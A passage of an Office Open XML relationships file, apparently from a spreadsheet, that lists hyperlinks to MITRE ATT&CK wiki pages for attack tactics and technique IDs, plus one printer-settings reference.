Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Defense_Evasion" TargetMode="External"/><Relationship Id="rId357" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Defense_Evasion" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Execution" TargetMode="External"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1073" TargetMode="External"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1008" TargetMode="External"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1185" TargetMode="External"/><Relationship Id="rId399" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Initial_Access" TargetMode="External"/><Relationship Id="rId259" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1174" TargetMode="External"/><Relationship Id="rId424" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Persistence" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1138" TargetMode="External"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Defense_Evasion" TargetMode="External"/><Relationship Id="rId270" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1013" TargetMode="External"/><Relationship Id="rId326" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Persistence" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1092" TargetMode="External"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1114" TargetMode="External"/><Relationship Id="rId368" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1095" TargetMode="External"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1187" TargetMode="External"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1104" TargetMode="External"/><Relationship Id="rId281" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1093" TargetMode="External"/><Relationship Id="rId337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1063" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1020" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Defense_Evasion" TargetMode="External"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Exfiltration" TargetMode="External"/><Relationship Id="rId379" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Discovery" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Privilege_Escalation" TargetMode="External"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Persistence" TargetMode="External"/><Relationship Id="rId239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Persistence" TargetMode="External"/><Relationship Id="rId390" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Lateral_Movement" TargetMode="External"/><Relationship Id="rId404" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1204" TargetMode="External"/><Relationship Id="rId250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Privilege_Escalation" TargetMode="External"/><Relationship Id="rId292" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Persistence" TargetMode="External"/><Relationship Id="rId306" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1021" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1176" TargetMode="External"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Command_and_Control" TargetMode="External"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1213" TargetMode="External"/><Relationship Id="rId348" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1023" TargetMode="External"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1068" TargetMode="External"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Defense_Evasion" TargetMode="External"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Credential_Access" TargetMode="External"/><Relationship Id="rId415" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Defense_Evasion" TargetMode="External"/><Relationship Id="rId261" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1201" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Credential_Access" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Persistence" TargetMode="External"/><Relationship Id="rId317" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Defense_Evasion" TargetMode="External"/><Relationship Id="rId359" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Initial_Access" TargetMode="External"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1002" TargetMode="External"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Defense_Evasion" TargetMode="External"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1107" TargetMode="External"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1036" TargetMode="External"/><Relationship Id="rId370" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1195" TargetMode="External"/><Relationship Id="rId426" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Execution" TargetMode="External"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1188" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Privilege_Escalation" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1109" TargetMode="External"/><Relationship Id="rId272" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Privilege_Escalation" TargetMode="External"/><Relationship Id="rId328" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1029" TargetMode="External"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1106" TargetMode="External"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1061" TargetMode="External"/><Relationship Id="rId381" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Discovery" TargetMode="External"/><Relationship Id="rId241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Discovery" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1197" TargetMode="External"/><Relationship Id="rId283" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1055" TargetMode="External"/><Relationship Id="rId339" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1101" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1136" TargetMode="External"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Command_and_Control" TargetMode="External"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Exfiltration" TargetMode="External"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1062" TargetMode="External"/><Relationship Id="rId350" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1218" TargetMode="External"/><Relationship Id="rId406" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1078" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Persistence" TargetMode="External"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Credential_Access" TargetMode="External"/><Relationship Id="rId392" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Persistence" TargetMode="External"/><Relationship Id="rId252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Defense_Evasion" TargetMode="External"/><Relationship Id="rId294" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Defense_Evasion" TargetMode="External"/><Relationship Id="rId308" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1018" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1110" TargetMode="External"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Command_and_Control" TargetMode="External"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1005" TargetMode="External"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1210" TargetMode="External"/><Relationship Id="rId361" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Initial_Access" TargetMode="External"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Defense_Evasion" TargetMode="External"/><Relationship Id="rId417" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Persistence" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Persistence" TargetMode="External"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1031" TargetMode="External"/><Relationship Id="rId263" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1034" TargetMode="External"/><Relationship Id="rId319" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1178" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Collection" TargetMode="External"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Lateral_Movement" TargetMode="External"/><Relationship Id="rId330" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1113" TargetMode="External"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1006" TargetMode="External"/><Relationship Id="rId372" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1019" TargetMode="External"/><Relationship Id="rId428" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1004" TargetMode="External"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1026" TargetMode="External"/><Relationship Id="rId274" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Execution" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Discovery" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Persistence" TargetMode="External"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1129" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1003" TargetMode="External"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1200" TargetMode="External"/><Relationship Id="rId341" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1035" TargetMode="External"/><Relationship Id="rId383" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Discovery" TargetMode="External"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Credential_Access" TargetMode="External"/><Relationship Id="rId243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Defense_Evasion" TargetMode="External"/><Relationship Id="rId285" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Privilege_Escalation" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Persistence" TargetMode="External"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Exfiltration" TargetMode="External"/><Relationship Id="rId310" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1091" TargetMode="External"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Defense_Evasion" TargetMode="External"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Initial_Access" TargetMode="External"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1183" TargetMode="External"/><Relationship Id="rId352" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Execution" TargetMode="External"/><Relationship Id="rId394" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Defense_Evasion" TargetMode="External"/><Relationship Id="rId408" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Persistence" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Property:Has_link_text" TargetMode="External"/><Relationship Id="rId212" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Execution" TargetMode="External"/><Relationship Id="rId233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Command_and_Control" TargetMode="External"/><Relationship Id="rId254" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Persistence" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1123" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1088" TargetMode="External"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1039" TargetMode="External"/><Relationship Id="rId275" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1145" TargetMode="External"/><Relationship Id="rId296" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1117" TargetMode="External"/><Relationship Id="rId300" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Command_and_Control" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Defense_Evasion" TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Credential_Access" TargetMode="External"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Execution" TargetMode="External"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1133" TargetMode="External"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Initial_Access" TargetMode="External"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Defense_Evasion" TargetMode="External"/><Relationship Id="rId321" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1198" TargetMode="External"/><Relationship Id="rId342" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Execution" TargetMode="External"/><Relationship Id="rId363" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Initial_Access" TargetMode="External"/><Relationship Id="rId384" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1124" TargetMode="External"/><Relationship Id="rId419" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1077" TargetMode="External"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1130" TargetMode="External"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1112" TargetMode="External"/><Relationship Id="rId244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1135" TargetMode="External"/><Relationship Id="rId430" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/printerSettings" Target="../printerSettings/printerSettings8.bin"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1103" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1009" TargetMode="External"/><Relationship Id="rId265" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Privilege_Escalation" TargetMode="External"/><Relationship Id="rId286" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1012" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Defense_Evasion" TargetMode="External"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1001" TargetMode="External"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Command_and_Control" TargetMode="External"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1203" TargetMode="External"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1044" TargetMode="External"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Defense_Evasion" TargetMode="External"/><Relationship Id="rId311" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Lateral_Movement" TargetMode="External"/><Relationship Id="rId332" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1180" TargetMode="External"/><Relationship Id="rId353" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1216" TargetMode="External"/><Relationship Id="rId374" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1082" TargetMode="External"/><Relationship Id="rId395" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1127" TargetMode="External"/><Relationship Id="rId409" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Privilege_Escalation" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Defense_Evasion" TargetMode="External"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1038" TargetMode="External"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Persistence" TargetMode="External"/><Relationship Id="rId234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1079" TargetMode="External"/><Relationship Id="rId420" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Lateral_Movement" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Property:Has_tactic" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Collection" TargetMode="External"/><Relationship Id="rId255" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1075" TargetMode="External"/><Relationship Id="rId276" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Credential_Access" TargetMode="External"/><Relationship Id="rId297" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Defense_Evasion" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Defense_Evasion" TargetMode="External"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Collection" TargetMode="External"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1048" TargetMode="External"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Persistence" TargetMode="External"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1158" TargetMode="External"/><Relationship Id="rId301" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1076" TargetMode="External"/><Relationship Id="rId322" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Defense_Evasion" TargetMode="External"/><Relationship Id="rId343" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1058" TargetMode="External"/><Relationship Id="rId364" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1071" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1059" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1081" TargetMode="External"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Technique/T1056" TargetMode="External"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Defense_Evasion" TargetMode="External"/><Relationship Id="rId385" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Discovery" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/wiki/Persistence" TargetMode="External"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 